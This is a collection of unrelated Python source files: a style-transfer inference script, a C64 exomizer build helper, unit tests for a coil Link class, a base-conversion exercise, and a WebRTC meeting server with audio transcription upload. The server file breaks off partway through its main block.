# Testing settings
# Content/style directories are scanned for images; every (content, style)
# pair is stylized in the __main__ block below.
parser = argparse.ArgumentParser(description='PyTorch TxST Example')
parser.add_argument('--content', type=str, default='data/content', help="content images")
parser.add_argument('--style', type=str, default='data/style', help='style images')
opt = parser.parse_args()
def tensor_rgb2gray(tensor_img):
    """Convert an (N, 3, H, W) RGB tensor to grayscale.

    Uses the ITU-R BT.601 luma weights (0.299, 0.587, 0.114) and expands the
    single luma channel back to the input's shape so the result still has
    three (identical) channels.
    """
    red = tensor_img[:, 0:1, :, :]
    green = tensor_img[:, 1:2, :, :]
    blue = tensor_img[:, 2:3, :, :]
    luma = red * 0.299 + green * 0.587 + blue * 0.114
    return luma.expand(tensor_img.size())
def read_content_img(img_path, img_siz=None):
    """Load an RGB image as a normalized 1xCxHxW CUDA tensor.

    When ``img_siz`` is given the image is resized to (img_siz, img_siz)
    first; otherwise the original resolution is kept. Normalization uses the
    standard ImageNet mean/std.
    """
    steps = []
    if img_siz is not None:
        steps.append(transforms.Resize((img_siz, img_siz)))
    steps.append(transforms.ToTensor())
    steps.append(transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]))
    pipeline = transforms.Compose(steps)
    img = Image.open(img_path).convert('RGB')
    return pipeline(img).unsqueeze(0).cuda()
def read_style_img(img_path, img_siz=256):
    """Load a style image plus the CLIP token of its parent-folder name.

    The style label is taken from the directory containing the image, with
    underscores replaced by spaces before tokenization.
    """
    style_img = read_content_img(img_path, img_siz)
    label = os.path.basename(os.path.dirname(img_path))
    # print(label)
    style_token = clip.tokenize(label.replace("_", " "))[0].unsqueeze(0).cuda()
    return style_img, style_token
def custom_text(text):
    """Tokenize free-form text with CLIP, returning a 1xL CPU tensor."""
    tokens = clip.tokenize(text)
    return tokens[0].unsqueeze(0)
if __name__ == '__main__':
    # Load the pretrained style-transfer model onto the GPU; strict=False
    # tolerates checkpoint keys that do not match the current model class.
    m_model = StyleTransfer.load_from_checkpoint(
        "models/wikiart_subset.ckpt", strict=False).cuda()
    cont_imgs = glob.glob(os.path.join(opt.content, "*.*"))
    style_imgs = glob.glob(os.path.join(opt.style, "*.*"))
    # Stylize every (content, style) pair and save the result under output/.
    for cont_file in cont_imgs:
        for style_file in style_imgs:
            save_path = os.path.join("output/", "%s_stylized_%s.png"%(pathlib.Path(cont_file).stem,pathlib.Path(style_file).stem))
            I_c = read_content_img(cont_file, img_siz=512)
            I_s, style_token = read_style_img(style_file)
            # ==== original inference ====
            # encoding
            F_c = m_model.encoder(I_c)
            F_clip_c = m_model.text_editor.encode_img(I_c)
            F_clip_s = m_model.text_editor.encode_img(I_s)
            # style transfer
            styled = m_model.transform(F_clip_c['raw_feat'], F_clip_s['raw_feat'], F_c)
            # decoding
            I_cs = m_model.decoder(styled)
            # visualize: undo ImageNet normalization and clamp into [0, 1].
            m_unnormalize = UnNormalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))
            transfer = m_unnormalize(I_cs).squeeze(0).clamp(0, 1).cpu().data
            # Add 0.5 after unnormalizing to [0, 255] to round to nearest integer
            ndarr = transfer.mul(255).add_(0.5).clamp_(0, 255).permute(1, 2, 0).to('cpu', torch.uint8).numpy()
            im = Image.fromarray(ndarr)
            im.save(save_path)
            # im.show()
# === next file ===
#!/usr/bin/env python3
# ----------------------------------------------------------------------------
# Copyright 2019 Drunella
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import sys
import glob
import subprocess
import argparse
import traceback
import re
import pprint
def file_readaddress(filename):
    """Return the 16-bit little-endian load address from a .prg file.

    The first two bytes of a C64 .prg file are the load address, stored
    low byte first.
    """
    with open(filename, "rb") as f:
        header = f.read(2)
    return header[1] * 256 + header[0]
#def file_prependaddress(filename, address):
# low = address % 256
# high = address // 256
# with open(filename, "rb") as f:
# data = f.read()
# with open(filename, "wb") as f:
# f.seek(0)
# b = bytearray(1)
# b[0] = low
# f.write(b)
# b[0] = high
# f.write(b)
# f.write(data)
def file_crunch(infilename, outfilename, crunchtype, startaddress=0):
    """Compress ``infilename`` into ``outfilename`` with the external exomizer tool.

    crunchtype is "level" (EasyFlash) or "mem" (d81 images; ``startaddress``
    is passed as the load address). Parses exomizer's stdout and raises the
    module-global ``safety_offset`` to the largest offset seen.
    """
    global safety_offset
    if crunchtype == "level":
        # for easyflash
        arguments = ["exomizer", "level", \
            "-T4", "-P7", \
            "-m", "256", \
            "-M", "256", \
            "-o", outfilename, \
            infilename \
            ]
    elif crunchtype == "mem":
        # for d81
        arguments = ["exomizer", "mem", \
            "-l", "0x{0:04x}".format(startaddress), \
            "-T4", "-P7", \
            "-m", "256", \
            "-M", "256", \
            "-o", outfilename, \
            infilename \
            ]
    else:
        raise Exception("unknown type " + crunchtype)
    result = subprocess.run(arguments, stdout=subprocess.PIPE, universal_newlines=True)
    if result.returncode != 0:
        raise Exception("error crunching file " + infilename)
    # Scrape the compression summary from exomizer's output.
    m = re.search("Crunched data reduced ([0-9-]*) bytes .([0-9-]*).", result.stdout)
    if not m:
        print("warning: no compression info on " + outfilename)
    else:
        size = int(m.group(1), 0)  # NOTE(review): parsed but currently unused
        ratio = int(m.group(2), 0)
        if ratio < 0:
            print("warning: negative ratio (" + str(ratio) + "%) for " + outfilename)
            # NOTE(review): this early return skips the safety-offset scan
            # below for negative-ratio files — confirm that is intentional.
            return
    m = re.search("safety offset is ([0-9]*)", result.stdout)
    if not m:
        print("warning: no safety offset on " + outfilename)
    else:
        offset = int(m.group(1), 0)
        # Track the worst-case safety offset across all crunched files.
        if offset > safety_offset:
            safety_offset = offset
def main(argv):
    """Crunch every .prg file in the build directory with exomizer.

    Writes a ``.crunch`` file next to each ``.prg``, creates a
    ``crunched.done`` marker for make, and prints the maximum safety offset.
    """
    global source_path  # NOTE(review): declared but never used in this function
    global safety_offset
    p = argparse.ArgumentParser()
    p.add_argument("-v", dest="verbose", action="store_true", help="Verbose output.")
    p.add_argument("-b", dest="build", action="store", required=True, help="build directory.")
    p.add_argument("-t", dest="type", action="store", required=True, help="exomizer type.")
    args = p.parse_args()
    # temp_path = os.path.join(args.build, "temp")
    # os.makedirs(temp_path, exist_ok=True)
    files_path = args.build #os.path.join(args.build, "files")
    os.makedirs(files_path, exist_ok=True)
    # Validate the requested exomizer mode up front.
    if args.type == "mem":
        crunchtype = "mem"
    elif args.type == "level":
        crunchtype = "level"
    else:
        raise Exception("unknown type " + args.type)
    # First pass: count the .prg files so progress output can show a total.
    amount = 0
    for filename in os.listdir(files_path):
        if not filename.endswith(".prg"):
            continue
        amount += 1
    count = 0
    safety_offset = 0
    # Second pass: crunch each file, reading its load address from the header.
    for f in os.listdir(files_path):
        if not f.endswith(".prg"):
            continue
        count += 1
        if args.verbose:
            print("processing file {0:d} of {1:d} \r".format(count, amount), end='\r')
        basename = f[0:-4]
        infilename = os.path.join(files_path, f)
        outfilename = os.path.join(files_path, basename + ".crunch")
        address = file_readaddress(infilename)
        file_crunch(infilename, outfilename, crunchtype, address)
        #file_prependaddress(outfilename, address)
    if args.verbose:
        print("")
    # make a file to let make know we are ready
    ready_path = os.path.join(files_path, "crunched.done")
    open(ready_path, 'a').close()
    print("maximum safety offset is: " + str(safety_offset))
if __name__ == '__main__':
    try:
        # Propagate main()'s return value as the process exit code.
        sys.exit(main(sys.argv))
    except Exception as exc:
        # Report the failure and exit non-zero so the build notices.
        print(exc)
        traceback.print_exc()
        sys.exit(1)
# === coil/test/test_link.py ===
"""Tests for coil.struct.Link"""
import unittest
from coil import errors
from coil.struct import Node, Link
class BasicTestCase(unittest.TestCase):
    """Exercise Link path resolution and copying across Node trees.

    Fix: ``assertEquals`` is a deprecated alias that was removed in
    Python 3.12 — replaced throughout with ``assertEqual``.
    """

    def setUp(self):
        # Build the tree @root -> a -> b used by every test.
        self.r = Node()
        self.a = Node(None, self.r, "a")
        self.b = Node(None, self.a, "b")

    def assertRelative(self, link, expect):
        # Resolve the link's own path relative to its container.
        relative = link.relative_path(link.link_path, '..')
        self.assertEqual(relative, expect)

    def assertAbsolute(self, link, expect):
        absolute = link.absolute_path(link.link_path, '..')
        self.assertEqual(absolute, expect)

    def testInit(self):
        w = Link("@root", self.r, "w")
        x = Link("i.j.k", self.r, "x")
        y = Link("..j.k", self.a, "y")
        z = Link("..k", self.b, "z")
        self.assertRelative(w, ".")
        self.assertAbsolute(w, "@root")
        self.assertRelative(x, "i.j.k")
        self.assertAbsolute(x, "@root.i.j.k")
        self.assertRelative(y, "..j.k")
        self.assertAbsolute(y, "@root.j.k")
        self.assertRelative(z, "..k")
        self.assertAbsolute(z, "@root.a.k")
        # A parent reference above @root is invalid.
        self.assertRaises(errors.CoilError, Link, "..z", self.r, "z")

    def testCopy1(self):
        x = Link("b", self.a, "x")
        self.assertEqual(x.node_path, "@root.a.x")
        self.assertRelative(x, "b")
        self.assertAbsolute(x, "@root.a.b")
        a2 = self.a.copy()
        x2 = x.copy(a2, "x")
        self.assertEqual(x2.node_path, "@root.x")
        self.assertRelative(x2, "b")
        self.assertAbsolute(x2, "@root.b")

    def testCopy2(self):
        x = Link("..i", self.a, "x")
        y = x.copy(self.b, "y")
        self.assertEqual(x.node_path, "@root.a.x")
        self.assertRelative(x, "..i")
        self.assertAbsolute(x, "@root.i")
        self.assertEqual(y.node_path, "@root.a.b.y")
        self.assertRelative(y, "..i")
        self.assertAbsolute(y, "@root.a.i")

    def testCopyTree1(self):
        # Relative links keep their relative meaning when a whole tree is copied.
        x = Link("i", self.a, "x")
        self.assertEqual(x.node_path, "@root.a.x")
        self.assertEqual(x.link_path, "i")
        self.assertRelative(x, "i")
        self.assertAbsolute(x, "@root.a.i")
        y = x.copy(self.b, "y")
        self.assertEqual(y.node_path, "@root.a.b.y")
        self.assertEqual(y.link_path, "i")
        self.assertRelative(y, "i")
        self.assertAbsolute(y, "@root.a.b.i")
        r2 = self.r.copy()
        a2 = self.a.copy(r2, "a")
        b2 = self.b.copy(a2, "b")
        x2 = x.copy(a2, "x")
        y2 = y.copy(b2, "y")
        self.assertEqual(x2.node_path, "@root.a.x")
        self.assertEqual(x2.link_path, "i")
        self.assertRelative(x2, "i")
        self.assertAbsolute(x2, "@root.a.i")
        self.assertEqual(y2.node_path, "@root.a.b.y")
        self.assertEqual(y2.link_path, "i")
        self.assertRelative(y2, "i")
        self.assertAbsolute(y2, "@root.a.b.i")

    def testCopyTree2(self):
        # Absolute links remain anchored to the same target after a tree copy.
        x = Link("@root.a.i", self.a, "x")
        self.assertEqual(x.node_path, "@root.a.x")
        self.assertEqual(x.link_path, "@root.a.i")
        self.assertRelative(x, "i")
        self.assertAbsolute(x, "@root.a.i")
        y = x.copy(self.b, "y")
        self.assertEqual(y.node_path, "@root.a.b.y")
        self.assertEqual(y.link_path, "@root.a.i")
        self.assertRelative(y, "..i")
        self.assertAbsolute(y, "@root.a.i")
        r2 = self.r.copy()
        a2 = self.a.copy(r2, "a")
        b2 = self.b.copy(a2, "b")
        x2 = x.copy(a2, "x")
        y2 = y.copy(b2, "y")
        self.assertEqual(x2.node_path, "@root.a.x")
        self.assertEqual(x2.link_path, "@root.a.i")
        self.assertRelative(x2, "i")
        self.assertAbsolute(x2, "@root.a.i")
        self.assertEqual(y2.node_path, "@root.a.b.y")
        self.assertEqual(y2.link_path, "@root.a.i")
        self.assertRelative(y2, "..i")
        self.assertAbsolute(y2, "@root.a.i")

    def testCopySubTree1(self):
        # Copying a subtree to a new root re-roots relative links.
        x = Link("i", self.a, "x")
        self.assertEqual(x.node_path, "@root.a.x")
        self.assertEqual(x.link_path, "i")
        self.assertRelative(x, "i")
        self.assertAbsolute(x, "@root.a.i")
        y = x.copy(self.b, "y")
        self.assertEqual(y.node_path, "@root.a.b.y")
        self.assertEqual(y.link_path, "i")
        self.assertRelative(y, "i")
        self.assertAbsolute(y, "@root.a.b.i")
        a2 = self.a.copy()
        b2 = self.b.copy(a2, "b")
        x2 = x.copy(a2, "x")
        y2 = y.copy(b2, "y")
        self.assertEqual(x2.node_path, "@root.x")
        self.assertEqual(x2.link_path, "i")
        self.assertRelative(x2, "i")
        self.assertAbsolute(x2, "@root.i")
        self.assertEqual(y2.node_path, "@root.b.y")
        self.assertEqual(y2.link_path, "i")
        self.assertRelative(y2, "i")
        self.assertAbsolute(y2, "@root.b.i")

    def testCopySubTree2(self):
        # Copying a subtree rewrites absolute link paths to the new root.
        x = Link("@root.a.i", self.a, "x")
        self.assertEqual(x.node_path, "@root.a.x")
        self.assertEqual(x.link_path, "@root.a.i")
        self.assertRelative(x, "i")
        self.assertAbsolute(x, "@root.a.i")
        y = x.copy(self.b, "y")
        self.assertEqual(y.node_path, "@root.a.b.y")
        self.assertEqual(y.link_path, "@root.a.i")
        self.assertRelative(y, "..i")
        self.assertAbsolute(y, "@root.a.i")
        a2 = self.a.copy()
        b2 = self.b.copy(a2, "b")
        x2 = x.copy(a2, "x")
        y2 = y.copy(b2, "y")
        self.assertEqual(x2.node_path, "@root.x")
        self.assertEqual(x2.link_path, "@root.i")
        self.assertRelative(x2, "i")
        self.assertAbsolute(x2, "@root.i")
        self.assertEqual(y2.node_path, "@root.b.y")
        self.assertEqual(y2.link_path, "@root.i")
        self.assertRelative(y2, "..i")
        self.assertAbsolute(y2, "@root.i")
# === next file ===
#!python
import string
# Hint: Use these string constants to encode/decode hexadecimal digits and more
# string.digits is '0123456789'
# string.hexdigits is '0123456789abcdefABCDEF'
# string.ascii_lowercase is 'abcdefghijklmnopqrstuvwxyz'
# string.ascii_uppercase is 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# string.ascii_letters is ascii_lowercase + ascii_uppercase
# string.printable is digits + ascii_letters + punctuation + whitespace
def binary_to_decimal(binary):
    """Converts a binary number(str) into a decimal(int).

    Iterates the digits from least to most significant; every character
    other than '0' contributes 2**position (matching the original code's
    treatment of non-'0' characters as set bits).
    """
    total = 0
    for power, digit in enumerate(reversed(binary)):
        if digit == "0":
            continue  # a zero bit adds nothing
        total += 2 ** power
    return total
def decimal_to_binary(decimal):
    """Converts a decimal(int) into binary(str).

    Repeated division by two, collecting remainders; note this returns the
    empty string for an input of 0, exactly like the original.
    """
    bits = []
    while decimal > 0:
        decimal, remainder = divmod(decimal, 2)
        bits.append(str(remainder))
    return ''.join(reversed(bits))
def hex_to_decimal(hex_val):
    """Converts hex value(str) to decimal(int).

    Case-insensitive: each character is lowercased and looked up in
    string.hexdigits, so 'a'-'f' map to 10-15.
    """
    alphabet = string.hexdigits  # '0123456789abcdefABCDEF'
    total = 0
    # Reversed so the character position equals the power of 16.
    for power, ch in enumerate(hex_val[::-1]):
        total += alphabet.index(ch.lower()) * (16 ** power)
    return total
def decimal_to_hex(decimal):
    """Converts decimal(int) to hex value(str).

    Repeated division by 16, prepending each remainder's hex digit.
    Returns lowercase digits; like decimal_to_binary, returns '' for 0.
    """
    hex_result = ''
    hex_conversion = string.hexdigits  # indices 0-15 map to '0'-'9','a'-'f'
    while decimal > 0:
        remainder = decimal % 16
        # Bug fix: the original loop never appended the digit, so the
        # function always returned ''. Prepend the hex digit here.
        hex_result = hex_conversion[remainder] + hex_result
        decimal = int(decimal / 16)
    return hex_result
def decode(digits, base):
    """Decode given digits in given base to number in base 10.
    digits: str -- string representation of number (in given base)
    base: int -- base of given number
    return: int -- integer representation of number (in base 10)"""
    # Handle up to base 36 [0-9a-z]
    assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
    # Bug fix: the original looked digits up in string.hexdigits, which only
    # covers 0-f, so any base > 16 digit ('g'-'z') raised ValueError. The
    # digits-then-lowercase alphabet covers all 36 digit values and agrees
    # with hexdigits on 0-15, so bases <= 16 behave exactly as before.
    alphabet = string.digits + string.ascii_lowercase
    decoded_result = 0
    # Reversed so the character position equals the power of the base.
    for power, ch in enumerate(digits[::-1]):
        decoded_result += alphabet.index(ch.lower()) * (base ** power)
    return decoded_result
def encode(number, base):
    """Encode given number in base 10 to digits in given base.
    number: int -- integer representation of number (in base 10)
    base: int -- base to convert to
    return: str -- string representation of number (in given base)"""
    # Handle up to base 36 [0-9a-z]
    assert 2 <= base <= 36, 'base is out of range: {}'.format(base)
    # Handle unsigned numbers only for now
    assert number >= 0, 'number is negative: {}'.format(number)
    # Zero has no remainders to collect; return its digit explicitly.
    if number == 0:
        return '0'
    # Bug fixes vs. the original: the alphabet must include 0-9 before a-z
    # (ascii_lowercase alone maps remainder 0 to 'a'), index() needs the
    # remainder argument, and digits must be prepended rather than
    # overwriting the accumulator.
    alphabet = string.digits + string.ascii_lowercase
    encoded_result = ''
    while number > 0:
        number, remainder = divmod(number, base)
        encoded_result = alphabet[remainder] + encoded_result
    return encoded_result
def convert(digits, base1, base2):
    """Convert given digits in base1 to digits in base2.
    digits: str -- string representation of number (in base1)
    base1: int -- base of given number
    base2: int -- base to convert to
    return: str -- string representation of number (in base2)"""
    # Handle up to base 36 [0-9a-z]
    assert 2 <= base1 <= 36, 'base1 is out of range: {}'.format(base1)
    assert 2 <= base2 <= 36, 'base2 is out of range: {}'.format(base2)
    # Round-trip through base 10: decode from base1, re-encode in base2.
    return encode(decode(digits, base1), base2)
# TODO: Convert digits from base 2 to base 16 (and vice versa)
# ...
# TODO: Convert digits from base 2 to base 10 (and vice versa)
# ...
# TODO: Convert digits from base 10 to base 16 (and vice versa)
# ...
# TODO: Convert digits from any base to any base (2 up to 36)
# ...
def main():
    """Read command-line arguments and convert given digits between bases."""
    import sys
    args = sys.argv[1:]  # Ignore script file name
    # Guard clause: anything other than exactly three args prints usage.
    if len(args) != 3:
        print('Usage: {} digits base1 base2'.format(sys.argv[0]))
        print('Converts digits from base1 to base2')
        return
    digits = args[0]
    base1 = int(args[1])
    base2 = int(args[2])
    # Convert given digits between bases
    result = convert(digits, base1, base2)
    print('{} in base {} is {} in base {}'.format(
        digits, base1, result, base2))
if __name__ == '__main__':
    main()
# Demo calls — NOTE(review): these run at module top level, so they execute
# on import as well as when run as a script; confirm that is intended.
print('binary to decimal:')
print(binary_to_decimal('101010'))
print('decimal to binay:')
print(decimal_to_binary(10))
print('hex to decimal:')
print(hex_to_decimal('FF'))
print('decimal to hex:')
print(decimal_to_hex(185))
print("DECODE")
print(decode('14414', 5))
print(decode('1010', 2))
print(decode('B9', 16))
print("ENCODE")
# NOTE(review): with the original (broken) encode implementation this call
# raised TypeError (conversion.index() with no argument) — verify encode.
print(encode(10, 16))
# === next file ===
import argparse
import asyncio
import json
import logging
import os
import ssl
import uuid
import weakref
from datetime import datetime, timedelta
from io import BytesIO
from threading import Thread
import aiohttp
import aiohttp_cors
import av
import requests
from aiohttp import web
from aiortc import MediaStreamTrack, RTCPeerConnection, RTCSessionDescription
from aiortc.contrib.media import MediaBlackhole, MediaPlayer
from pydub import AudioSegment
from dotenv import load_dotenv
def convert(ogg_file):
    """Transcode an OGG input into a 16 kHz WAV export (pydub file-like)."""
    audio = AudioSegment.from_ogg(ogg_file)
    # -ar 16000 forces the 16 kHz sample rate expected by the transcriber.
    return audio.export(format="wav", bitrate="16k", parameters=["-ar", "16000"])
def convert_wav_to_ogg(wav_file):
    """Transcode a WAV input into an OGG export (pydub file-like)."""
    audio = AudioSegment.from_wav(wav_file)
    return audio.export(format="ogg")
# Server-wide mutable state and configuration.
ROOT = os.path.dirname(__file__)
logger = logging.getLogger("pc")
speakers = dict()  # RTCPeerConnection -> set of tracks that peer publishes
pcs = set()  # all live peer connections (closed in on_shutdown)
meetings = dict()
buffer = BytesIO()
# Make sure we have the fresh dotenv
load_dotenv()
# configs
USE_TRANSCRIBER = bool(os.getenv('USE_TRANSCRIBER', "false") == "true")
TRANSLATOR_ENDPOINT = str(os.getenv('TRANSLATOR_ENDPOINT', "http://localhost:5000/upload"))
print(f"USE_TRANSCRIBER: {USE_TRANSCRIBER}")
print(f"TRANSLATOR_ENDPOINT: {TRANSLATOR_ENDPOINT}")
# On IBM Cloud Cloud Foundry, get the port number from the environment variable PORT
# When running this app on the local machine, default the port to 8080
port = int(os.getenv('PORT', 8080))
STATIC_PATH = os.path.join(ROOT, "build/static/")
def call_external_translator(ogg_buffer):
    """POST raw OGG bytes to the external transcription service (blocking)."""
    logging.info(f"Calling transcripts dir")
    payload = {'file': ('helloworld.ogg', BytesIO(ogg_buffer))}
    requests.post(TRANSLATOR_ENDPOINT, files=payload)
    logging.info("Submitted transcript")
class AudioTransformTrack(MediaStreamTrack):
    """Pass-through audio track that also records ~5-second WAV chunks.

    Frames from the wrapped track are returned unmodified; when
    USE_TRANSCRIBER is set they are additionally muxed into a WAV file,
    which every ~5 seconds is converted to OGG and shipped to the external
    transcriber in a background thread.
    """
    kind = "audio"
    codec_name = "pcm_s16le"
    # codec_name = "pcm_s16be"
    # codec_name = "aac"
    def __init__(self, track):
        super().__init__()
        self.track = track  # upstream MediaStreamTrack to wrap
        self._init_container()
        self.now = datetime.now()  # start of the current recording window
    def _init_container(self):
        # Open a fresh timestamped WAV container for the next chunk.
        self.filename = os.path.join(ROOT, f"test{datetime.now()}.wav")
        self.container = av.open(self.filename, mode="w")
        self.stream = self.container.add_stream(self.codec_name)
        logger.info(f"recording on track {self.track}")
    def send_buffer_to_encoder(self):
        # call_external_translator(self.filename)
        # recording_buffer = open(self.filename, "rb").read()
        # Convert the finished WAV chunk to OGG and post it off-thread so
        # recv() is not blocked by the HTTP call.
        ogg_buffer = convert_wav_to_ogg(open(self.filename, "rb")).read()
        Thread(target=call_external_translator, args=(ogg_buffer, )).start()
        logging.info(f"done, removing: {self.filename}")
        os.unlink(self.filename)
        # t.join()
    async def encode_to_container(self, frame):
        if self.container:
            for packet in self.stream.encode(frame):
                self.container.mux(packet)
        # NOTE(review): the rotation below runs even when self.container is
        # None, so close() could hit None in that window — confirm recv()'s
        # broad except is what keeps this safe.
        diff = datetime.now() - self.now
        if diff > timedelta(seconds=5):
            self.container.close()
            self.container = None
            print("dumping")
            self.send_buffer_to_encoder()
            # print(self.buffer.getbuffer().nbytes)
            self.now = datetime.now()
            self._init_container()
    async def recv(self):
        # Always forward the frame; recording is best-effort.
        frame = await self.track.recv()
        # logger.info(f"Got a new frame!!!! {frame}")
        try:
            if USE_TRANSCRIBER:
                await self.encode_to_container(frame)
        except Exception as e:
            logging.exception("Exception parsing frame")
        return frame
async def index(request):
    """Serve the SPA entry point (build/index.html)."""
    # Fix: open the file in a context manager — the original left the file
    # handle unclosed (a per-request resource leak).
    with open(os.path.join(ROOT, "build", "index.html"), "r") as f:
        content = f.read()
    return web.Response(content_type="text/html", text=content)
async def listener(request):
    """Answer a WebRTC offer from a listen-only client.

    Subscribes the new peer to every track currently published by active
    speakers and returns the SDP answer as JSON.
    """
    params = await request.json()
    offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
    # Closure over pc_id (assigned below) for tagged logging.
    def log_info(msg, *args):
        logger.info(pc_id + " " + msg, *args)
    pc = RTCPeerConnection()
    pc_id = "PeerConnection(%s)" % uuid.uuid4()
    pcs.add(pc)
    @pc.on("iceconnectionstatechange")
    async def on_iceconnectionstatechange():
        log_info("ICE connection state is %s", pc.iceConnectionState)
        if pc.iceConnectionState == "failed":
            await pc.close()
            pcs.discard(pc)
    # Forward every active speaker's tracks to this listener.
    for speaker, tracks in speakers.items():
        log_info("adding speakers")
        if speaker and speaker.iceConnectionState != "failed":
            for track in tracks:
                pc.addTrack(track)
    @pc.on("track")
    def on_track(track):
        # Listeners are receive-only; incoming tracks are ignored.
        log_info("Track %s received", track.kind)
        if track.kind == "audio":
            pass
        @track.on("ended")
        async def on_ended():
            log_info("Track %s ended", track.kind)
    await pc.setRemoteDescription(offer)
    # send answer
    answer = await pc.createAnswer()
    await pc.setLocalDescription(answer)
    return web.Response(
        content_type="application/json",
        text=json.dumps(
            {"sdp": pc.localDescription.sdp, "type": pc.localDescription.type}
        ),
    )
async def offer(request):
    """Answer a WebRTC offer from a speaker (publishing) client.

    Registers the peer's audio/video tracks in the module-level ``speakers``
    map (audio is wrapped in AudioTransformTrack for transcription) and
    returns the SDP answer as JSON.
    """
    params = await request.json()
    offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
    pc = RTCPeerConnection()
    pc_id = "PeerConnection(%s)" % uuid.uuid4()
    print(pc_id)
    pcs.add(pc)
    # pcs_to_tracks[pc] = []
    # add_tracks_to_pcs()
    def log_info(msg, *args):
        logger.info(pc_id + " " + msg, *args)
    log_info("Created for %s", request.remote)
    # prepare local media
    # player = MediaPlayer(os.path.join(ROOT, "demo-instruct.wav"))
    # MediaBlackhole consumes the wrapped audio so recv() keeps being called.
    recorder = MediaBlackhole()
    @pc.on("datachannel")
    def on_datachannel(channel):
        @channel.on("message")
        def on_message(message):
            log_info(f"got message: {message}")
            # Simple ping/pong keep-alive protocol on the data channel.
            if isinstance(message, str) and message.startswith("ping"):
                channel.send("pong" + message[4:])
    @pc.on("iceconnectionstatechange")
    async def on_iceconnectionstatechange():
        log_info("ICE connection state is %s", pc.iceConnectionState)
        if pc.iceConnectionState == "failed":
            await pc.close()
            pcs.discard(pc)
            # Drop this speaker's published tracks from the registry.
            speaker_to_remove = speakers.get(pc)
            if speaker_to_remove:
                speakers.pop(pc, None)
    @pc.on("negotiationneeded")
    def on_negotiaion_needed():
        log_info("negotiation needed")
    @pc.on("track")
    def on_track(track):
        log_info("Track %s received", track.kind)
        if pc not in speakers:
            speakers[pc] = set()
        if track.kind == "audio":
            # Wrap audio so frames can be recorded/transcribed in transit.
            local_audio = AudioTransformTrack(track)
            speakers[pc].add(local_audio)
            recorder.addTrack(local_audio)
        elif track.kind == "video":
            # Video is looped straight back and shared with listeners.
            speakers[pc].add(track)
            pc.addTrack(track)
        @track.on("ended")
        async def on_ended():
            log_info("Track %s ended", track.kind)
    # handle offer
    await pc.setRemoteDescription(offer)
    await recorder.start()
    # send answer
    answer = await pc.createAnswer()
    await pc.setLocalDescription(answer)
    return web.Response(
        content_type="application/json",
        text=json.dumps(
            {"sdp": pc.localDescription.sdp, "type": pc.localDescription.type}
        ),
    )
async def on_shutdown(app):
    """aiohttp shutdown hook: close all peer connections and websockets."""
    # close peer connections
    coros = [pc.close() for pc in pcs]
    await asyncio.gather(*coros)
    pcs.clear()
    for ws in app['websockets']:
        # NOTE(review): aiohttp's WebSocketResponse.close expects ``message``
        # as bytes; passing a str here may raise — confirm against the
        # aiohttp version in use.
        await ws.close(code=aiohttp.WSCloseCode.GOING_AWAY, message='Server shutdown')
class WebSocket(web.View):
    """Websocket signalling endpoint for meetings.

    Handles three message types from clients:
      - 'create-meeting': register a meeting and its host.
      - 'join-meeting':   add a participant to a meeting.
      - 'send-message':   broadcast a chat message to every connected socket.
    """

    async def get(self):
        ws = web.WebSocketResponse()
        await ws.prepare(self.request)
        self.request.app['websockets'].add(ws)

        def participant_list(meeting_name):
            # Build the roster for a meeting, flagging which entry is the host.
            # Uses self.request.app (not the module-level `app`) so the view
            # works with whatever application it is mounted on.
            meeting = self.request.app['meetings'][meeting_name]
            host = meeting['host']
            return [{'username': participant, 'isHost': participant == host}
                    for participant in meeting['participants']]

        try:
            async for msg in ws:
                if msg.type == aiohttp.WSMsgType.TEXT:
                    data = json.loads(msg.data)
                    meetings = self.request.app['meetings']
                    if data['type'] == 'create-meeting':
                        meeting_name = data['meetingName']
                        if meeting_name in meetings:
                            # Meeting already exists: creator joins and takes over hosting.
                            meetings[meeting_name]['participants'].append(
                                data['username'])
                            meetings[meeting_name]['host'] = data['username']
                        else:
                            meetings[meeting_name] = {
                                'host': data['username'],
                                'participants': [data['username']],
                            }
                        # Use a distinct name for the outgoing payload so the
                        # incoming websocket message `msg` is not clobbered.
                        payload = json.dumps(
                            {'type': 'participants-list', 'participants': participant_list(meeting_name)})
                        await ws.send_str(payload)
                    elif data['type'] == 'join-meeting':
                        meeting_name = data['meetingName']
                        if meeting_name in meetings:
                            meetings[meeting_name]['participants'].append(
                                data['username'])
                        else:
                            # BUG FIX: 'host' must be the username string, not a
                            # one-element list -- participant_list compares each
                            # participant against it with ==, so a list value
                            # made isHost always False for meetings created here.
                            meetings[meeting_name] = {
                                'host': data['username'],
                                'participants': [data['username']],
                            }
                        payload = json.dumps(
                            {'type': 'participants-list', 'participants': participant_list(meeting_name)})
                        # Roster changes are broadcast to every connected socket.
                        for _ws in self.request.app['websockets']:
                            await _ws.send_str(payload)
                    elif data['type'] == 'send-message':
                        # Broadcast to everyone, rewriting the type for clients.
                        data['type'] = "add-message"
                        payload = json.dumps(data)
                        for _ws in self.request.app['websockets']:
                            await _ws.send_str(payload)
                elif msg.type == aiohttp.WSMsgType.ERROR:
                    # Transport error: fall through and let the socket close.
                    pass
        finally:
            # Always drop the socket from the broadcast set, even on error.
            self.request.app['websockets'].discard(ws)

        return ws
def add_cors_routes(routes, cors):
    """Register fully permissive CORS options on each of the given routes."""
    # One shared, wildcard-origin configuration applied to every route.
    allow_all = aiohttp_cors.ResourceOptions(
        expose_headers="*",
        allow_headers="*")
    for route in routes:
        cors.add(route, {"*": allow_all})
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="WebRTC audio / video"
    )
    # parser.add_argument("--cert-file", help="SSL certificate file (for HTTPS)")
    # parser.add_argument("--key-file", help="SSL key file (for HTTPS)")
    parser.add_argument(
        "--host", default="0.0.0.0", help="Host for HTTP server (default: 0.0.0.0)"
    )
    # BUG FIX: web.run_app below referenced an undefined name `port` (NameError
